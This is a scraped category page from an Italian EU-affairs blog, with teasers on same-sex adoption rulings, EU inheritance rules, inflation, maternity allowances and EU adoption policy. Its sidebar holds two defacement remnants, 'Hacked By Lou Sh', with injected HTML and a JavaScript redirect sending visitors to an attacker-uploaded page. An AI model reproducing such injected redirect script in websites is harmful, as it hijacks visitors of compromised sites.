EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Famiglia

Famiglia


Famiglia

it

Le coppie gay, potranno ora adottare, proprio come avviene per le etero, il figlio di uno dei partner avuto da una precedente relazione.

Parità di diritti per le coppie omosessuali. E’ quello a cui finalmente si sta per andare incontro dopo la sentenza della Corte Europea dei diritti umani, che ha dato ragione ad una coppia di donne austriache che avevano fatto ricorso dopo una precedente sentenza. La sentenza, definitiva perché (...)

it

L’eterno dibattito sulla questione di dover celebrare o meno un matrimonio tra persone dello stesso sesso è tutt’ora accesa, ma grazie a questa nuova sentenza emessa dalla corte europea dei diritti umani di Strasburgo le cose cambiano radicalmente. Nel caso in cui nel paese siano in vigore norme che regolamentano i rapporti tra coppie gay, i funzionari pubblici non potranno rifiutarsi di celebrare il rito civile del matrimonio.

Il caso nasce in Gran Bretagna da un’impiegata pubblica che si è rifiutata di celebrare le nozze tra una coppia omosessuale a causa del suo credo religioso e per questo è stata licenziata. Oggi, grazie alla nuova sentenza emessa dalla Corte dei diritti umani di Strasburgo, questo non sarà più (...)

it

Il Parlamento Europeo ha approvato il nuovo regolamento che punta a semplificare l'esecuzione delle volontà testamentarie e sveltire interminabili e gravosi processi nel caso di un cittadino europeo deceduto in un Paese diverso da quello d'origine, il cui testamento implichi più di un sistema giuridico nazionale

Prima dello scorso martedì 13 marzo in Europa era praticamente impossibile superare gli ostacoli burocratici legati al tema dell’eredità. Ci si domandava: se mi sposo e vado a vivere in un altro Paese membro, quale iter giuridico devo seguire per la successione in caso di decesso? Bene ora è tutto (...)

it

Le regioni italiane però sono ancora molto indietro sulla messa a punto degli immobili, e il tempo per la ratifica della direttiva varata dall’U.E. nel 2008 sta scadendo. Diversi i motivi con cui si può spiegare questo ritardo nella ricezione della direttiva U.E.

Il rapporto dell’O.M.S. e la direttiva U.E. Il recente rapporto dell’Organizzazione Mondiale della Sanità sull’impatto sanitario del rumore in Europa ha avuto modo di evidenziare come e quanto possa essere dannoso il frastuono provocato dal traffico per l’udito umano. Secondo questo studio infatti (...)

it

Circa un mese fa, ci eravamo già occupati, e preoccupati, dell’aumento dell’inflazione in Italia e in tutta l’Eurozona (articolo 6 marzo 2011). Passando in rassegna la situazione, avevamo chiuso l’articolo aspettando di vedere lo svolgersi degli eventi per stabilire se ci si doveva o no preoccupar e davvero. Ebbene, la situazione sembra non migliorare affatto. Anzi. Se a gennaio l’inflazione toccava il 2,2%, le nuove statistiche affermano che nell’area OCSE sale fino al 2,4%. Un record, più di un punto in più rispetto all’anno scorso, e una percentuale che non si vedeva dal 2008.

Sembra non ci sia da star tranquilli, l’inflazione aumenta. Indubbio è che tutto questo sia condizionato dalla difficile situazione libica, dove ormai tutta l’Europa è coinvolta. Schizzano i prezzi quindi dei carburanti, ma quello che ancora di più preoccupa è l’aumento dei generi alimentari. In (...)

it

Seppur le prime due edizioni non hanno avuto il successo che ci si aspettava, la Commissione Europea non ha alcuna intenzione di mollare un progetto simile. L’ iniziativa “Frutta nelle Scuole” torna anche per il prossimo anno accademico 2011/2012, mentre quello attuale si sta per chiudere, a maggio.

Il progetto “Frutta nelle Scuole” è stato promosso la prima volta nel 2008/2009, con grande entusiasmo da parte della Commissione Europea. Purtroppo gli esiti non sono stati quelli sperati. Infatti, le adesioni, almeno nella prima edizione, sono state molto basse. Dei 90 milioni di euro (...)

it

Sono cambiate le procedure per richiedere gli assegni di maternità per il 2011. Quest’anno sarà possibile inviare la propria domanda via posta o attraverso un fax. Possibilità di fare richiesta fino al sesto mese di vita del bambino.

L’assegno di maternità, istituito con la legge 448 del 23/12/98, prevede che sia erogato dallo Stato un assegno, con un importo che viene valutato ogni anno, alle madri per una loro tutela e per un sostegno nel momento più felice si, ma anche più difficile per una donna.

L’assegno che viene (...)

it

Quest’anno è stata una coccarda rosa, non la classica mimosa, il simbolo della Giornata mondiale della donna; un fiocco virtuale, spiegano le donne, attrici, registe, politiche, storiche e giornaliste, con cui legarsi tutte, nel 150° Anniversario dell’Unità d’Italia, per una rinascita del nostro Paese.

Le mimose appassite del giorno dopo: 8 Marzo, Festa della donna. Più che donna, Cenerentola; la festa è finita, si mettono da parte fiori e i cioccolatini e torna un nuovo giorno, un giorno qualsiasi. Nel giorno qualsiasi, la donna italiana si scontra coi soliti vecchi fantasmi, sospesa fra il (...)

it

Tre bambini, Raul Mircea, il più piccolo di 4 anni, Fernando, 5 anni e Sebastian, 11 anni, e una bimba, Patrizia, di otto anni, probabilmente morti nel sonno. A quanto riferito da alcuni abitanti dell'insediamento, i fratellini erano stati lasciati soli nella baracca.

Il Capo dello Stato si è recato all’Istituto di medicina legale del Verano, in visita alle salme dei bambini, e ha incontrato i genitori dei piccoli. A provocare il rogo, probabilmente un braciere acceso per il freddo. Presente anche il sindaco della città Gianni Alemanno: "Napolitano ha espresso (...)

28
01
2011

Novità adozioni

it

Il Parlamento europeo ha votato all’unanimità lo scorso 19 gennaio la risoluzione riguardante la richiesta di una politica unica per le adozioni al fine di incoraggiare questo nobile gesto attraverso una semplificazione delle procedure. L’accordo raggiunto vuole dare la massima importanza ai bambini e tutelare i loro interessi. La risoluzione approvata dal Parlamento riunito nella sua sede di Strasburgo (dove si tengono le assemblee plenarie dell’istituzione in questione) prevede una cooperazione a livello di Unione europea riguardo le politiche di adozione su scala internazionale. Il documento afferma una priorità all’adozione nel paese d’origine del minore e inoltre sottolinea come il ricorso ad istituti ed orfanotrofi debba essere una soluzione provvisoria.

Purtroppo, quando si tratta di unificare le diverse e numerose legislazioni nazionali, i problemi burocratici sono sempre quelli che creano i disagi maggiori: per questo motivi gli Stati si propongono di rinnovare il loro impegno nell’eliminazione della burocrazia superflua per consentire un più (...)

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato




Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015



© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France